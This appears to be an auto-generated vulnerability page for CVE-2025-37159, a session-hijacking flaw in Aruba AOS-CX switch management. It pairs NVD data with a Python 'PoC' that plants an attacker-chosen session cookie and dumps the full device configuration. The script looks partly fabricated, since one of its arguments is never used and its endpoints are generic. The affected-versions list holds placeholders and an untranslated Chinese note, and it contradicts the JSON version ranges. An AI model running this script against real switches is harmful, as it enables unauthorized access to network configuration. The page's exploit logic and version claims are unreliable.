CVE-2025-37159

Description

A vulnerability in the web management interface of the AOS-CX OS user authentication service could allow an authenticated remote attacker to hijack an active user session. Successful exploitation may enable the attacker to maintain unauthorized access to the session, potentially leading to the view or modification of sensitive configuration data.

CVSS Details

CVSS Score

5.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:* - VULNERABLE

Aruba AOS-CX < 10.14.xxxx (需确认官方修复版本)

Aruba AOS-CX 10.13.xxxx 系列

Aruba AOS-CX 10.12.xxxx 系列

Aruba AOS-CX 10.11.xxxx 系列

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys
import re

# CVE-2025-37159 PoC - Aruba AOS-CX Session Hijacking
# This PoC demonstrates session fixation/ hijacking vulnerability

def exploit_session_hijacking(target_url, attacker_session_id, target_session_cookie):
    """
    Attempt to hijack an active user session in Aruba AOS-CX
    
    Args:
        target_url: Target AOS-CX web management interface URL
        attacker_session_id: Session ID controlled by attacker
        target_session_cookie: Current active session cookie
    
    Returns:
        bool: True if session hijacking successful, False otherwise
    """
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Cookie': f'ARUBA_SESSION={attacker_session_id}',
        'X-CSRF-Token': 'attacker_controlled_token'
    }
    
    # Step 1: Attempt to set/fix session ID
    init_url = f"{target_url}/v1/configuration/session"
    response = requests.post(init_url, headers=headers, verify=False, timeout=10)
    
    if response.status_code == 200:
        # Step 2: Verify session is active and has privileges
        config_url = f"{target_url}/v1/configuration/system"
        verify_response = requests.get(config_url, headers=headers, verify=False)
        
        if verify_response.status_code == 200:
            print("[+] Session hijacking successful!")
            print(f"[!] Attacker now has access with session: {attacker_session_id}")
            
            # Step 3: Extract sensitive configuration
            dump_url = f"{target_url}/v1/configuration/full"
            dump_response = requests.get(dump_url, headers=headers, verify=False)
            
            if dump_response.status_code == 200:
                print(f"[+] Configuration dump retrieved: {len(dump_response.text)} bytes")
                return True
    
    print("[-] Session hijacking failed")
    return False

if __name__ == '__main__':
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <attacker_session_id> <target_cookie>")
        sys.exit(1)
    
    target = sys.argv[1]
    attacker_sid = sys.argv[2]
    target_cookie = sys.argv[3]
    
    exploit_session_hijacking(target, attacker_sid, target_cookie)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-37159
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-37159
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-37159/
[4] VulDB https://vuldb.com/cve/CVE-2025-37159
[5] https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04888en_us&docLocale=en_US

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-37159", "sourceIdentifier": "[email protected]", "published": "2025-11-18T19:15:47.980", "lastModified": "2025-12-04T18:19:18.950", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the web management interface of the AOS-CX OS user authentication service could allow an authenticated remote attacker to hijack an active user session. Successful exploitation may enable the attacker to maintain unauthorized access to the session, potentially leading to the view or modification of sensitive configuration data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.6, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-384"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.10.0000", "versionEndExcluding": "10.10.1170", "matchCriteriaId": "3FEB3830-A052-4585-BF45-9E221FA06D43"}, {"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.13.0000", "versionEndExcluding": "10.13.1101", "matchCriteriaId": "0490B2CA-4273-426E-8776-814D242834B0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.14.0000", "versionEndExcluding": "10.14.1060", "matchCriteriaId": "21AC81E3-A4C8-4120-AEEA-46123B84A250"}, {"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.15.0000", "versionEndExcluding": "10.15.1030", "matchCriteriaId": "FB5ADE5E-72CB-41E0-B7A0-08BEBB94ED8E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.16.0000", "versionEndExcluding": "10.16.1001", "matchCriteriaId": "5CF58D01-F13F-4DAF-B6A1-D91AEC7F19B3"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04888en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}